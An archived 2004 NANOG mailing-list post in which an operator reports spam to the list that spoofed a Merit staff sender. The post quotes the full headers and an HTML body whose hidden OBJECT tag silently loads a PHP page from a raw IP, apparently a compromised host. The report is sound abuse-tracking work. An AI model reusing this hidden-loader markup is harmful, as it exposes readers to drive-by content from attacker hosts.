nanog mailing list archives
now what - spam to nanog spoofing susan harris?
From: Suresh Ramasubramanian <suresh () outblaze com>
Date: Thu, 18 Mar 2004 08:18:59 +0530
Mailed out through an open proxy / hacked machine in some australian museum, with a body that tries to load this html page - http://24.84.218.164:81/641280.php
Page is hosted on a shawcable conection (probably another trojaned box) that I can't seem to access, though the host is barely pingable
srs
Return-Path: <owner-nanog () merit edu> Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26]) by corpmail.outblaze.com (Postfix) with ESMTP id B199316DD9F; Thu, 18 Mar 2004 02:43:17 +0000 (GMT) Received: by trapdoor.merit.edu (Postfix) id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Received: by trapdoor.merit.edu (Postfix, from userid 56) id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F for <nanog () trapdoor merit edu>; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Received: by segue.merit.edu (Postfix) id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 8220D5DE34 for <nanog () merit edu>; Wed, 17 Mar 2004 21:40:43 -0500 (EST) Delivered-To: nanog-outgoing () trapdoor merit edu Delivered-To: nanog () trapdoor merit edu Delivered-To: nanog () merit edu Date: Thu, 18 Mar 2004 13:40:35 +1000 To: nanog () merit edu Subject: Request response From: srh () merit edu Message-ID: <xpvmqgksfnpfrcuagqc () merit edu> MIME-Version: 1.0 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-nanog () merit edu Precedence: bulk Errors-To: owner-nanog-outgoing () merit edu X-Loop: nanog X-AntiVirus: checked by Vexira MailArmor (version: 2.0.1.11; VAE: 6.24.0.7; VDF: 6.24.0.61; host: corpmail.outblaze.com) <html><body> <font face="System"> <OBJECT STYLE="display:none" DATA="http://24.84.218.164:81/641280.php"> </OBJECT></body></html>
Current thread:
- now what - spam to nanog spoofing susan harris? Suresh Ramasubramanian (Mar 17)